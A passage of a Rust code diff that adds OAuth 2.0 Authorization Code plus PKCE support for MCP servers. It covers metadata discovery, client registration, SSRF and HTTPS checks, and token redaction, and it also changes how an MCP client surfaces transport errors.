+ /// Single-slot side channel for the last transport-level error. When the
+ /// output task encounters a send failure it stashes the error here and
+ /// exits; the next request to observe cancellation `.take()`s it so it can
+ /// propagate a typed error (e.g. `TransportError::AuthRequired`) instead
+ /// of a generic "cancelled". This works because `initialize` is the sole
+ /// in-flight request at startup, but would need rethinking if concurrent
+ /// requests are ever issued during that phase.
+ last_transport_error: Arc<Mutex<Option<anyhow::Error>>>,
}
#[derive(Clone, Debug, PartialEq, Eq, PartialOrd, Ord, Hash)]
@@ -223,13 +231,16 @@ impl Client {
input.or(err)
});
+ let last_transport_error: Arc<Mutex<Option<anyhow::Error>>> = Arc::new(Mutex::new(None));
let output_task = cx.background_spawn({
let transport = transport.clone();
+ let last_transport_error = last_transport_error.clone();
Self::handle_output(
transport,
outbound_rx,
output_done_tx,
response_handlers.clone(),
+ last_transport_error,
)
.log_err()
});
@@ -246,6 +257,7 @@ impl Client {
output_done_rx: Mutex::new(Some(output_done_rx)),
transport,
request_timeout,
+ last_transport_error,
})
}
@@ -279,7 +291,7 @@ impl Client {
if let Some(handlers) = response_handlers.lock().as_mut()
&& let Some(handler) = handlers.remove(&response.id)
{
- handler(Ok(message.to_string()));
+ handler(message.to_string());
}
} else if let Ok(notification) = serde_json::from_str::<AnyNotification>(&message) {
subscription_set.lock().notify(
@@ -315,6 +327,7 @@ impl Client {
outbound_rx: channel::Receiver<String>,
output_done_tx: barrier::Sender,
response_handlers: Arc<Mutex<Option<HashMap<RequestId, ResponseHandler>>>>,
+ last_transport_error: Arc<Mutex<Option<anyhow::Error>>>,
) -> anyhow::Result<()> {
let _clear_response_handlers = util::defer({
let response_handlers = response_handlers.clone();
@@ -324,7 +337,11 @@ impl Client {
});
while let Ok(message) = outbound_rx.recv().await {
log::trace!("outgoing message: {}", message);
- transport.send(message).await?;
+ if let Err(err) = transport.send(message).await {
+ log::debug!("transport send failed: {:#}", err);
+ *last_transport_error.lock() = Some(err);
+ return Ok(());
+ }
}
drop(output_done_tx);
Ok(())
@@ -408,7 +425,7 @@ impl Client {
response = rx.fuse() => {
let elapsed = started.elapsed();
log::trace!("took {elapsed:?} to receive response to {method:?} id {id}");
- match response? {
+ match response {
Ok(response) => {
let parsed: AnyResponse = serde_json::from_str(&response)?;
if let Some(error) = parsed.error {
@@ -419,7 +436,12 @@ impl Client {
anyhow::bail!("Invalid response: no result or error");
}
}
- Err(_) => anyhow::bail!("cancelled")
+ Err(_canceled) => {
+ if let Some(err) = self.last_transport_error.lock().take() {
+ return Err(err);
+ }
+ anyhow::bail!("cancelled")
+ }
}
}
_ = cancel_fut => {
@@ -1,5 +1,6 @@
pub mod client;
pub mod listener;
+pub mod oauth;
pub mod protocol;
#[cfg(any(test, feature = "test-support"))]
pub mod test;
@@ -0,0 +1,2800 @@
+//! OAuth 2.0 authentication for MCP servers using the Authorization Code +
+//! PKCE flow, per the MCP spec's OAuth profile.
+//!
+//! The flow is split into two phases:
+//!
+//! 1. **Discovery** ([`discover`]) fetches Protected Resource Metadata and
+//! Authorization Server Metadata. This can happen early (e.g. on a 401
+//! during server startup) because it doesn't need the redirect URI yet.
+//!
+//! 2. **Client registration** ([`resolve_client_registration`]) is separate
+//! because DCR requires the actual loopback redirect URI, which includes an
+//! ephemeral port that only exists once the callback server has started.
+//!
+//! After authentication, the full state is captured in [`OAuthSession`] which
+//! is persisted to the keychain. On next startup, the stored session feeds
+//! directly into [`McpOAuthTokenProvider`], giving a refresh-capable provider
+//! without requiring another browser flow.
+
+use anyhow::{Context as _, Result, anyhow, bail};
+use async_trait::async_trait;
+use base64::Engine as _;
+use futures::AsyncReadExt as _;
+use futures::channel::mpsc;
+use http_client::{AsyncBody, HttpClient, Request};
+use parking_lot::Mutex as SyncMutex;
+use rand::Rng as _;
+use serde::{Deserialize, Serialize};
+use sha2::{Digest, Sha256};
+
+use std::str::FromStr;
+use std::sync::Arc;
+use std::time::{Duration, SystemTime};
+use url::Url;
+use util::ResultExt as _;
+
+/// The CIMD URL where Zed's OAuth client metadata document is hosted.
+pub const CIMD_URL: &str = "https://zed.dev/oauth/client-metadata.json";
+
+/// Validate that a URL is safe to use as an OAuth endpoint.
+///
+/// OAuth endpoints carry sensitive material (authorization codes, PKCE
+/// verifiers, tokens) and must use TLS. Plain HTTP is only permitted for
+/// loopback addresses, per RFC 8252 Section 8.3.
+fn require_https_or_loopback(url: &Url) -> Result<()> {
+ if url.scheme() == "https" {
+ return Ok(());
+ }
+ if url.scheme() == "http" {
+ if let Some(host) = url.host() {
+ match host {
+ url::Host::Ipv4(ip) if ip.is_loopback() => return Ok(()),
+ url::Host::Ipv6(ip) if ip.is_loopback() => return Ok(()),
+ url::Host::Domain(d) if d.eq_ignore_ascii_case("localhost") => return Ok(()),
+ _ => {}
+ }
+ }
+ }
+ bail!(
+ "OAuth endpoint must use HTTPS (got {}://{})",
+ url.scheme(),
+ url.host_str().unwrap_or("?")
+ )
+}
+
+/// Validate that a URL is safe to use as an OAuth endpoint, including SSRF
+/// protections against private/reserved IP ranges.
+///
+/// This wraps [`require_https_or_loopback`] and adds IP-range checks to prevent
+/// an attacker-controlled MCP server from directing Zed to fetch internal
+/// network resources via metadata URLs.
+///
+/// **Known limitation:** Domain-name URLs that resolve to private IPs are *not*
+/// blocked here — full mitigation requires resolver-level validation (e.g. a
+/// custom `Resolve` implementation). This function only blocks IP-literal URLs.
+fn validate_oauth_url(url: &Url) -> Result<()> {
+ require_https_or_loopback(url)?;
+
+ if let Some(host) = url.host() {
+ match host {
+ url::Host::Ipv4(ip) => {
+ // Loopback is already allowed by require_https_or_loopback.
+ if ip.is_private() || ip.is_link_local() || ip.is_broadcast() || ip.is_unspecified()
+ {
+ bail!(
+ "OAuth endpoint must not point to private/reserved IP: {}",
+ ip
+ );
+ }
+ }
+ url::Host::Ipv6(ip) => {
+ // Check for IPv4-mapped IPv6 addresses (::ffff:a.b.c.d) which
+ // could bypass the IPv4 checks above.
+ if let Some(mapped_v4) = ip.to_ipv4_mapped() {
+ if mapped_v4.is_private()
+ || mapped_v4.is_link_local()
+ || mapped_v4.is_broadcast()
+ || mapped_v4.is_unspecified()
+ {
+ bail!(
+ "OAuth endpoint must not point to private/reserved IP: ::ffff:{}",
+ mapped_v4
+ );
+ }
+ }
+
+ if ip.is_unspecified() || ip.is_multicast() {
+ bail!(
+ "OAuth endpoint must not point to reserved IPv6 address: {}",
+ ip
+ );
+ }
+ // IPv6 Unique Local Addresses (fc00::/7). is_unique_local() is
+ // nightly-only, so check the prefix manually.
+ if (ip.segments()[0] & 0xfe00) == 0xfc00 {
+ bail!(
+ "OAuth endpoint must not point to IPv6 unique-local address: {}",
+ ip
+ );
+ }
+ }
+ url::Host::Domain(_) => {
+ // Domain-based SSRF prevention requires resolver-level checks.
+ // See known limitation in the doc comment above.
+ }
+ }
+ }
+
+ Ok(())
+}
+
+/// Parsed from the MCP server's WWW-Authenticate header or well-known endpoint
+/// per RFC 9728 (OAuth 2.0 Protected Resource Metadata).
+#[derive(Debug, Clone, Serialize, Deserialize)]
+pub struct ProtectedResourceMetadata {
+ pub resource: Url,
+ pub authorization_servers: Vec<Url>,
+ pub scopes_supported: Option<Vec<String>>,
+}
+
+/// Parsed from the authorization server's .well-known endpoint
+/// per RFC 8414 (OAuth 2.0 Authorization Server Metadata).
+#[derive(Debug, Clone, Serialize, Deserialize)]
+pub struct AuthServerMetadata {
+ pub issuer: Url,
+ pub authorization_endpoint: Url,
+ pub token_endpoint: Url,
+ pub registration_endpoint: Option<Url>,
+ pub scopes_supported: Option<Vec<String>>,
+ pub code_challenge_methods_supported: Option<Vec<String>>,
+ pub client_id_metadata_document_supported: bool,
+}
+
+/// The result of client registration — either CIMD or DCR.
+#[derive(Clone, Serialize, Deserialize)]
+pub struct OAuthClientRegistration {
+ pub client_id: String,
+ /// Only present for DCR-minted registrations.
+ pub client_secret: Option<String>,
+}
+
+impl std::fmt::Debug for OAuthClientRegistration {
+ fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+ f.debug_struct("OAuthClientRegistration")
+ .field("client_id", &self.client_id)
+ .field(
+ "client_secret",
+ &self.client_secret.as_ref().map(|_| "[redacted]"),
+ )
+ .finish()
+ }
+}
+
+/// Access and refresh tokens obtained from the token endpoint.
+#[derive(Clone, Serialize, Deserialize)]
+pub struct OAuthTokens {
+ pub access_token: String,
+ pub refresh_token: Option<String>,
+ pub expires_at: Option<SystemTime>,
+}
+
+impl std::fmt::Debug for OAuthTokens {
+ fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+ f.debug_struct("OAuthTokens")
+ .field("access_token", &"[redacted]")
+ .field(
+ "refresh_token",
+ &self.refresh_token.as_ref().map(|_| "[redacted]"),
+ )
+ .field("expires_at", &self.expires_at)
+ .finish()
+ }
+}
+
+/// Everything discovered before the browser flow starts. Client registration is
+/// resolved separately, once the real redirect URI is known.
+#[derive(Debug, Clone, Serialize, Deserialize)]
+pub struct OAuthDiscovery {
+ pub resource_metadata: ProtectedResourceMetadata,
+ pub auth_server_metadata: AuthServerMetadata,
+ pub scopes: Vec<String>,
+}
+
+/// The persisted OAuth session for a context server.
+///
+/// Stored in the keychain so startup can restore a refresh-capable provider
+/// without another browser flow. Deliberately excludes the full discovery
+/// metadata to keep the serialized size well within keychain item limits.
+#[derive(Clone, Serialize, Deserialize)]
+pub struct OAuthSession {
+ pub token_endpoint: Url,
+ pub resource: Url,
+ pub client_registration: OAuthClientRegistration,
+ pub tokens: OAuthTokens,
+}
+
+impl std::fmt::Debug for OAuthSession {
+ fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+ f.debug_struct("OAuthSession")
+ .field("token_endpoint", &self.token_endpoint)
+ .field("resource", &self.resource)
+ .field("client_registration", &self.client_registration)
+ .field("tokens", &self.tokens)
+ .finish()
+ }
+}
+
+/// Error codes defined by RFC 6750 Section 3.1 for Bearer token authentication.
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+pub enum BearerError {
+ /// The request is missing a required parameter, includes an unsupported
+ /// parameter or parameter value, or is otherwise malformed.
+ InvalidRequest,
+ /// The access token provided is expired, revoked, malformed, or invalid.
+ InvalidToken,
+ /// The request requires higher privileges than provided by the access token.
+ InsufficientScope,
+ /// An unrecognized error code (extension or future spec addition).
+ Other,
+}
+
+impl BearerError {
+ fn parse(value: &str) -> Self {
+ match value {
+ "invalid_request" => BearerError::InvalidRequest,
+ "invalid_token" => BearerError::InvalidToken,
+ "insufficient_scope" => BearerError::InsufficientScope,
+ _ => BearerError::Other,
+ }
+ }
+}
+
+/// Fields extracted from a `WWW-Authenticate: Bearer` header.
+///
+/// Per RFC 9728 Section 5.1, MCP servers include `resource_metadata` to point
+/// at the Protected Resource Metadata document. The optional `scope` parameter
+/// (RFC 6750 Section 3) indicates scopes required for the request.
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub struct WwwAuthenticate {
+ pub resource_metadata: Option<Url>,
+ pub scope: Option<Vec<String>>,
+ /// The parsed `error` parameter per RFC 6750 Section 3.1.
+ pub error: Option<BearerError>,
+ pub error_description: Option<String>,
+}
+
+/// Parse a `WWW-Authenticate` header value.
+///
+/// Expects the `Bearer` scheme followed by comma-separated `key="value"` pairs.
+/// Per RFC 6750 and RFC 9728, the relevant parameters are:
+/// - `resource_metadata` — URL of the Protected Resource Metadata document
+/// - `scope` — space-separated list of required scopes
+/// - `error` — error code (e.g. "insufficient_scope")
+/// - `error_description` — human-readable error description
+pub fn parse_www_authenticate(header: &str) -> Result<WwwAuthenticate> {
+ let header = header.trim();
+
+ let params_str = if header.len() >= 6 && header[..6].eq_ignore_ascii_case("bearer") {
+ header[6..].trim()
+ } else {
+ bail!("WWW-Authenticate header does not use Bearer scheme");
+ };
+
+ if params_str.is_empty() {
+ return Ok(WwwAuthenticate {
+ resource_metadata: None,
+ scope: None,
+ error: None,
+ error_description: None,
+ });
+ }
+
+ let params = parse_auth_params(params_str);
+
+ let resource_metadata = params
+ .get("resource_metadata")
+ .map(|v| Url::parse(v))
+ .transpose()
+ .map_err(|e| anyhow!("invalid resource_metadata URL: {}", e))?;
+
+ let scope = params
+ .get("scope")
+ .map(|v| v.split_whitespace().map(String::from).collect());
+
+ let error = params.get("error").map(|v| BearerError::parse(v));
+ let error_description = params.get("error_description").cloned();
+
+ Ok(WwwAuthenticate {
+ resource_metadata,
+ scope,
+ error,
+ error_description,
+ })
+}
+
+/// Parse comma-separated `key="value"` or `key=token` parameters from an
+/// auth-param list (RFC 7235 Section 2.1).
+fn parse_auth_params(input: &str) -> collections::HashMap<String, String> {
+ let mut params = collections::HashMap::default();
+ let mut remaining = input.trim();
+
+ while !remaining.is_empty() {
+ // Skip leading whitespace and commas.
+ remaining = remaining.trim_start_matches(|c: char| c == ',' || c.is_whitespace());
+ if remaining.is_empty() {
+ break;
+ }
+
+ // Find the key (everything before '=').
+ let eq_pos = match remaining.find('=') {
+ Some(pos) => pos,
+ None => break,
+ };
+
+ let key = remaining[..eq_pos].trim().to_lowercase();
+ remaining = &remaining[eq_pos + 1..];
+ remaining = remaining.trim_start();
+
+ // Parse the value: either quoted or unquoted (token).
+ let value;
+ if remaining.starts_with('"') {
+ // Quoted string: find the closing quote, handling escaped chars.
+ remaining = &remaining[1..]; // skip opening quote
+ let mut val = String::new();
+ let mut chars = remaining.char_indices();
+ loop {
+ match chars.next() {
+ Some((_, '\\')) => {
+ // Escaped character — take the next char literally.
+ if let Some((_, c)) = chars.next() {
+ val.push(c);
+ }
+ }
+ Some((i, '"')) => {
+ remaining = &remaining[i + 1..];
+ break;
+ }
+ Some((_, c)) => val.push(c),
+ None => {
+ remaining = "";
+ break;
+ }
+ }
+ }
+ value = val;
+ } else {
+ // Unquoted token: read until comma or whitespace.
+ let end = remaining
+ .find(|c: char| c == ',' || c.is_whitespace())
+ .unwrap_or(remaining.len());
+ value = remaining[..end].to_string();
+ remaining = &remaining[end..];
+ }
+
+ if !key.is_empty() {
+ params.insert(key, value);
+ }
+ }
+
+ params
+}
+
+/// Construct the well-known Protected Resource Metadata URIs for a given MCP
+/// server URL, per RFC 9728 Section 3.
+///
+/// Returns URIs in priority order:
+/// 1. Path-specific: `https://<host>/.well-known/oauth-protected-resource/<path>`
+/// 2. Root: `https://<host>/.well-known/oauth-protected-resource`
+pub fn protected_resource_metadata_urls(server_url: &Url) -> Vec<Url> {
+ let mut urls = Vec::new();
+ let base = format!("{}://{}", server_url.scheme(), server_url.authority());
+
+ let path = server_url.path().trim_start_matches('/');
+ if !path.is_empty() {
+ if let Ok(url) = Url::parse(&format!(
+ "{}/.well-known/oauth-protected-resource/{}",
+ base, path
+ )) {
+ urls.push(url);
+ }
+ }
+
+ if let Ok(url) = Url::parse(&format!("{}/.well-known/oauth-protected-resource", base)) {
+ urls.push(url);
+ }
+
+ urls
+}
+
+/// Construct the well-known Authorization Server Metadata URIs for a given
+/// issuer URL, per RFC 8414 Section 3.1 and Section 5 (OIDC compat).
+///
+/// Returns URIs in priority order, which differs depending on whether the
+/// issuer URL has a path component.
+pub fn auth_server_metadata_urls(issuer: &Url) -> Vec<Url> {
+ let mut urls = Vec::new();
+ let base = format!("{}://{}", issuer.scheme(), issuer.authority());
+ let path = issuer.path().trim_matches('/');
+
+ if !path.is_empty() {
+ // Issuer with path: try path-inserted variants first.
+ if let Ok(url) = Url::parse(&format!(
+ "{}/.well-known/oauth-authorization-server/{}",
+ base, path
+ )) {
+ urls.push(url);
+ }
+ if let Ok(url) = Url::parse(&format!(
+ "{}/.well-known/openid-configuration/{}",
+ base, path
+ )) {
+ urls.push(url);
+ }
+ if let Ok(url) = Url::parse(&format!(
+ "{}/{}/.well-known/openid-configuration",
+ base, path
+ )) {
+ urls.push(url);
+ }
+ } else {
+ // No path: standard well-known locations.
+ if let Ok(url) = Url::parse(&format!("{}/.well-known/oauth-authorization-server", base)) {
+ urls.push(url);
+ }
+ if let Ok(url) = Url::parse(&format!("{}/.well-known/openid-configuration", base)) {
+ urls.push(url);
+ }
+ }
+
+ urls
+}
+
+// -- Canonical server URI (RFC 8707) -----------------------------------------
+
+/// Derive the canonical resource URI for an MCP server URL, suitable for the
+/// `resource` parameter in authorization and token requests per RFC 8707.
+///
+/// Lowercases the scheme and host, preserves the path (without trailing slash),
+/// strips fragments and query strings.
+pub fn canonical_server_uri(server_url: &Url) -> String {
+ let mut uri = format!(
+ "{}://{}",
+ server_url.scheme().to_ascii_lowercase(),
+ server_url.host_str().unwrap_or("").to_ascii_lowercase(),
+ );
+ if let Some(port) = server_url.port() {
+ uri.push_str(&format!(":{}", port));
+ }
+ let path = server_url.path();
+ if path != "/" {
+ uri.push_str(path.trim_end_matches('/'));
+ }
+ uri
+}
+
+// -- Scope selection ---------------------------------------------------------
+
+/// Select scopes following the MCP spec's Scope Selection Strategy:
+/// 1. Use `scope` from the `WWW-Authenticate` challenge if present.
+/// 2. Fall back to `scopes_supported` from Protected Resource Metadata.
+/// 3. Return empty if neither is available.
+pub fn select_scopes(
+ www_authenticate: &WwwAuthenticate,
+ resource_metadata: &ProtectedResourceMetadata,
+) -> Vec<String> {
+ if let Some(ref scopes) = www_authenticate.scope {
+ if !scopes.is_empty() {
+ return scopes.clone();
+ }
+ }
+ resource_metadata
+ .scopes_supported
+ .clone()
+ .unwrap_or_default()
+}
+
+// -- Client registration strategy --------------------------------------------
+
/// The registration approach to use, determined from auth server metadata.
///
/// Produced by [`determine_registration_strategy`]; CIMD is preferred over
/// DCR when the server advertises support for both.
#[derive(Debug, Clone, PartialEq, Eq)]
pub enum ClientRegistrationStrategy {
    /// The auth server supports CIMD. Use the CIMD URL as client_id directly.
    Cimd { client_id: String },
    /// The auth server has a registration endpoint. Caller must POST to it.
    Dcr { registration_endpoint: Url },
    /// No supported registration mechanism.
    Unavailable,
}
+
+/// Determine how to register with the authorization server, following the
+/// spec's recommended priority: CIMD first, DCR fallback.
+pub fn determine_registration_strategy(
+ auth_server_metadata: &AuthServerMetadata,
+) -> ClientRegistrationStrategy {
+ if auth_server_metadata.client_id_metadata_document_supported {
+ ClientRegistrationStrategy::Cimd {
+ client_id: CIMD_URL.to_string(),
+ }
+ } else if let Some(ref endpoint) = auth_server_metadata.registration_endpoint {
+ ClientRegistrationStrategy::Dcr {
+ registration_endpoint: endpoint.clone(),
+ }
+ } else {
+ ClientRegistrationStrategy::Unavailable
+ }
+}
+
+// -- PKCE (RFC 7636) ---------------------------------------------------------
+
/// A PKCE code verifier and its S256 challenge.
///
/// The verifier is the secret half and must never be logged; the challenge is
/// derived from it and is safe to include in the authorization URL.
#[derive(Clone)]
pub struct PkceChallenge {
    /// Secret: sent only to the token endpoint during code exchange.
    pub verifier: String,
    /// Public: `BASE64URL(SHA256(verifier))`, sent in the authorization request.
    pub challenge: String,
}

// Manual Debug impl so the secret verifier cannot leak into logs.
impl std::fmt::Debug for PkceChallenge {
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("PkceChallenge")
            .field("verifier", &"[redacted]")
            .field("challenge", &self.challenge)
            .finish()
    }
}
+
+/// Generate a PKCE code verifier and S256 challenge per RFC 7636.
+///
+/// The verifier is 43 base64url characters derived from 32 random bytes.
+/// The challenge is `BASE64URL(SHA256(verifier))`.
+pub fn generate_pkce_challenge() -> PkceChallenge {
+ let mut random_bytes = [0u8; 32];
+ rand::rng().fill(&mut random_bytes);
+ let engine = base64::engine::general_purpose::URL_SAFE_NO_PAD;
+ let verifier = engine.encode(&random_bytes);
+
+ let digest = Sha256::digest(verifier.as_bytes());
+ let challenge = engine.encode(digest);
+
+ PkceChallenge {
+ verifier,
+ challenge,
+ }
+}
+
+// -- Authorization URL construction ------------------------------------------
+
+/// Build the authorization URL for the OAuth Authorization Code + PKCE flow.
+pub fn build_authorization_url(
+ auth_server_metadata: &AuthServerMetadata,
+ client_id: &str,
+ redirect_uri: &str,
+ scopes: &[String],
+ resource: &str,
+ pkce: &PkceChallenge,
+ state: &str,
+) -> Url {
+ let mut url = auth_server_metadata.authorization_endpoint.clone();
+ {
+ let mut query = url.query_pairs_mut();
+ query.append_pair("response_type", "code");
+ query.append_pair("client_id", client_id);
+ query.append_pair("redirect_uri", redirect_uri);
+ if !scopes.is_empty() {
+ query.append_pair("scope", &scopes.join(" "));
+ }
+ query.append_pair("resource", resource);
+ query.append_pair("code_challenge", &pkce.challenge);
+ query.append_pair("code_challenge_method", "S256");
+ query.append_pair("state", state);
+ }
+ url
+}
+
+// -- Token endpoint request bodies -------------------------------------------
+
/// The JSON body returned by the token endpoint on success.
///
/// Only the fields we consume are modeled; unknown fields are ignored by
/// serde. All fields except `access_token` are optional per RFC 6749.
#[derive(Deserialize)]
pub struct TokenResponse {
    pub access_token: String,
    #[serde(default)]
    pub refresh_token: Option<String>,
    /// Lifetime of the access token in seconds, relative to issuance.
    #[serde(default)]
    pub expires_in: Option<u64>,
    #[serde(default)]
    pub token_type: Option<String>,
}
+
// Manual Debug impl: tokens are credentials and must never appear in logs,
// so both token fields are redacted while non-sensitive metadata is shown.
impl std::fmt::Debug for TokenResponse {
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("TokenResponse")
            .field("access_token", &"[redacted]")
            .field(
                "refresh_token",
                // Shows Some("[redacted]") / None so presence is still visible.
                &self.refresh_token.as_ref().map(|_| "[redacted]"),
            )
            .field("expires_in", &self.expires_in)
            .field("token_type", &self.token_type)
            .finish()
    }
}
+
+impl TokenResponse {
+ /// Convert into `OAuthTokens`, computing `expires_at` from `expires_in`.
+ pub fn into_tokens(self) -> OAuthTokens {
+ let expires_at = self
+ .expires_in
+ .map(|secs| SystemTime::now() + Duration::from_secs(secs));
+ OAuthTokens {
+ access_token: self.access_token,
+ refresh_token: self.refresh_token,
+ expires_at,
+ }
+ }
+}
+
/// Build the form-encoded body for an authorization code token exchange.
///
/// Parameter order matches RFC 6749 Section 4.1.3; `code_verifier` (RFC 7636)
/// and `resource` (RFC 8707) are appended.
pub fn token_exchange_params(
    code: &str,
    client_id: &str,
    redirect_uri: &str,
    code_verifier: &str,
    resource: &str,
) -> Vec<(&'static str, String)> {
    let mut params = Vec::with_capacity(6);
    params.push(("grant_type", String::from("authorization_code")));
    params.push(("code", code.to_owned()));
    params.push(("redirect_uri", redirect_uri.to_owned()));
    params.push(("client_id", client_id.to_owned()));
    params.push(("code_verifier", code_verifier.to_owned()));
    params.push(("resource", resource.to_owned()));
    params
}
+
/// Build the form-encoded body for a token refresh request.
///
/// Parameter order matches RFC 6749 Section 6; `resource` (RFC 8707) is
/// appended.
pub fn token_refresh_params(
    refresh_token: &str,
    client_id: &str,
    resource: &str,
) -> Vec<(&'static str, String)> {
    let mut params = Vec::with_capacity(4);
    params.push(("grant_type", String::from("refresh_token")));
    params.push(("refresh_token", refresh_token.to_owned()));
    params.push(("client_id", client_id.to_owned()));
    params.push(("resource", resource.to_owned()));
    params
}
+
+// -- DCR request body (RFC 7591) ---------------------------------------------
+
/// Build the JSON body for a Dynamic Client Registration request.
///
/// The `redirect_uri` should be the actual loopback URI with the ephemeral
/// port (e.g. `http://127.0.0.1:12345/callback`). Some auth servers do strict
/// redirect URI matching even for loopback addresses, so we register the
/// exact URI we intend to use.
pub fn dcr_registration_body(redirect_uri: &str) -> serde_json::Value {
    serde_json::json!({
        "client_name": "Zed",
        "redirect_uris": [redirect_uri],
        // Authorization Code + PKCE only; no implicit or client-credentials.
        "grant_types": ["authorization_code"],
        "response_types": ["code"],
        // Public client: no client secret is used at the token endpoint.
        "token_endpoint_auth_method": "none"
    })
}
+
+// -- Discovery (async, hits real endpoints) ----------------------------------
+
/// Fetch Protected Resource Metadata from the MCP server.
///
/// Tries the `resource_metadata` URL from the `WWW-Authenticate` header first,
/// then falls back to well-known URIs constructed from `server_url`.
///
/// # Errors
///
/// Fails when no candidate URL yields metadata, or when fetched metadata
/// lists no authorization servers.
pub async fn fetch_protected_resource_metadata(
    http_client: &Arc<dyn HttpClient>,
    server_url: &Url,
    www_authenticate: &WwwAuthenticate,
) -> Result<ProtectedResourceMetadata> {
    // Only trust a header-supplied metadata URL when it is same-origin with
    // the MCP server; a cross-origin URL could point us at attacker-controlled
    // metadata, so it is logged and ignored in favor of well-known URIs.
    let candidate_urls = match &www_authenticate.resource_metadata {
        Some(url) if url.origin() == server_url.origin() => vec![url.clone()],
        Some(url) => {
            log::warn!(
                "Ignoring cross-origin resource_metadata URL {} \
                (server origin: {})",
                url,
                server_url.origin().unicode_serialization()
            );
            protected_resource_metadata_urls(server_url)
        }
        None => protected_resource_metadata_urls(server_url),
    };

    // Candidates are tried in priority order. A fetch/parse failure moves on
    // to the next candidate, but successfully fetched metadata that is invalid
    // (no authorization servers) aborts the whole discovery.
    for url in &candidate_urls {
        match fetch_json::<ProtectedResourceMetadataResponse>(http_client, url).await {
            Ok(response) => {
                if response.authorization_servers.is_empty() {
                    bail!(
                        "Protected Resource Metadata at {} has no authorization_servers",
                        url
                    );
                }
                return Ok(ProtectedResourceMetadata {
                    // Be lenient: default a missing `resource` field to the
                    // server URL rather than rejecting the document.
                    resource: response.resource.unwrap_or_else(|| server_url.clone()),
                    authorization_servers: response.authorization_servers,
                    scopes_supported: response.scopes_supported,
                });
            }
            Err(err) => {
                log::debug!(
                    "Failed to fetch Protected Resource Metadata from {}: {}",
                    url,
                    err
                );
            }
        }
    }

    bail!(
        "Could not fetch Protected Resource Metadata for {}",
        server_url
    )
}
+
/// Fetch Authorization Server Metadata, trying RFC 8414 and OIDC Discovery
/// endpoints in the priority order specified by the MCP spec.
///
/// # Errors
///
/// Fails when no candidate URL yields metadata, when the metadata's `issuer`
/// does not match the expected issuer, or when a required endpoint is missing.
pub async fn fetch_auth_server_metadata(
    http_client: &Arc<dyn HttpClient>,
    issuer: &Url,
) -> Result<AuthServerMetadata> {
    let candidate_urls = auth_server_metadata_urls(issuer);

    // Fetch failures fall through to the next candidate; a successfully
    // fetched but inconsistent document aborts discovery entirely.
    for url in &candidate_urls {
        match fetch_json::<AuthServerMetadataResponse>(http_client, url).await {
            Ok(response) => {
                // RFC 8414 Section 3.3: the metadata's issuer must match the
                // issuer we derived the URL from. A missing issuer field is
                // tolerated by defaulting to the expected value.
                let reported_issuer = response.issuer.unwrap_or_else(|| issuer.clone());
                if reported_issuer != *issuer {
                    bail!(
                        "Auth server metadata issuer mismatch: expected {}, got {}",
                        issuer,
                        reported_issuer
                    );
                }

                return Ok(AuthServerMetadata {
                    issuer: reported_issuer,
                    // Both endpoints are mandatory for the authorization code
                    // flow; fail fast if the server omits either.
                    authorization_endpoint: response
                        .authorization_endpoint
                        .ok_or_else(|| anyhow!("missing authorization_endpoint"))?,
                    token_endpoint: response
                        .token_endpoint
                        .ok_or_else(|| anyhow!("missing token_endpoint"))?,
                    registration_endpoint: response.registration_endpoint,
                    scopes_supported: response.scopes_supported,
                    code_challenge_methods_supported: response.code_challenge_methods_supported,
                    client_id_metadata_document_supported: response
                        .client_id_metadata_document_supported
                        .unwrap_or(false),
                });
            }
            Err(err) => {
                log::debug!("Failed to fetch Auth Server Metadata from {}: {}", url, err);
            }
        }
    }

    bail!(
        "Could not fetch Authorization Server Metadata for {}",
        issuer
    )
}
+
/// Run the full discovery flow: fetch resource metadata, then auth server
/// metadata, then select scopes. Client registration is resolved separately,
/// once the real redirect URI is known.
///
/// # Errors
///
/// Fails when either metadata fetch fails, when the auth server lacks S256
/// PKCE support, or when neither CIMD nor DCR registration is available.
pub async fn discover(
    http_client: &Arc<dyn HttpClient>,
    server_url: &Url,
    www_authenticate: &WwwAuthenticate,
) -> Result<OAuthDiscovery> {
    let resource_metadata =
        fetch_protected_resource_metadata(http_client, server_url, www_authenticate).await?;

    // Only the first advertised authorization server is used.
    let auth_server_url = resource_metadata
        .authorization_servers
        .first()
        .ok_or_else(|| anyhow!("no authorization servers in resource metadata"))?;

    let auth_server_metadata = fetch_auth_server_metadata(http_client, auth_server_url).await?;

    // Verify PKCE S256 support (spec requirement). A server that does not
    // advertise any methods is treated as unsupported rather than assumed OK.
    match &auth_server_metadata.code_challenge_methods_supported {
        Some(methods) if methods.iter().any(|m| m == "S256") => {}
        Some(_) => bail!("authorization server does not support S256 PKCE"),
        None => bail!("authorization server does not advertise code_challenge_methods_supported"),
    }

    // Verify there is at least one supported registration strategy before we
    // present the server as ready to authenticate.
    match determine_registration_strategy(&auth_server_metadata) {
        ClientRegistrationStrategy::Cimd { .. } | ClientRegistrationStrategy::Dcr { .. } => {}
        ClientRegistrationStrategy::Unavailable => {
            bail!("authorization server supports neither CIMD nor DCR")
        }
    }

    let scopes = select_scopes(www_authenticate, &resource_metadata);

    Ok(OAuthDiscovery {
        resource_metadata,
        auth_server_metadata,
        scopes,
    })
}
+
+/// Resolve the OAuth client registration for an authorization flow.
+///
+/// CIMD uses the static client metadata document directly. For DCR, a fresh
+/// registration is performed each time because the loopback redirect URI
+/// includes an ephemeral port that changes every flow.
+pub async fn resolve_client_registration(
+ http_client: &Arc<dyn HttpClient>,
+ discovery: &OAuthDiscovery,
+ redirect_uri: &str,
+) -> Result<OAuthClientRegistration> {
+ match determine_registration_strategy(&discovery.auth_server_metadata) {
+ ClientRegistrationStrategy::Cimd { client_id } => Ok(OAuthClientRegistration {
+ client_id,
+ client_secret: None,
+ }),
+ ClientRegistrationStrategy::Dcr {
+ registration_endpoint,
+ } => perform_dcr(http_client, ®istration_endpoint, redirect_uri).await,
+ ClientRegistrationStrategy::Unavailable => {
+ bail!("authorization server supports neither CIMD nor DCR")
+ }
+ }
+}
+
+// -- Dynamic Client Registration (RFC 7591) ----------------------------------
+
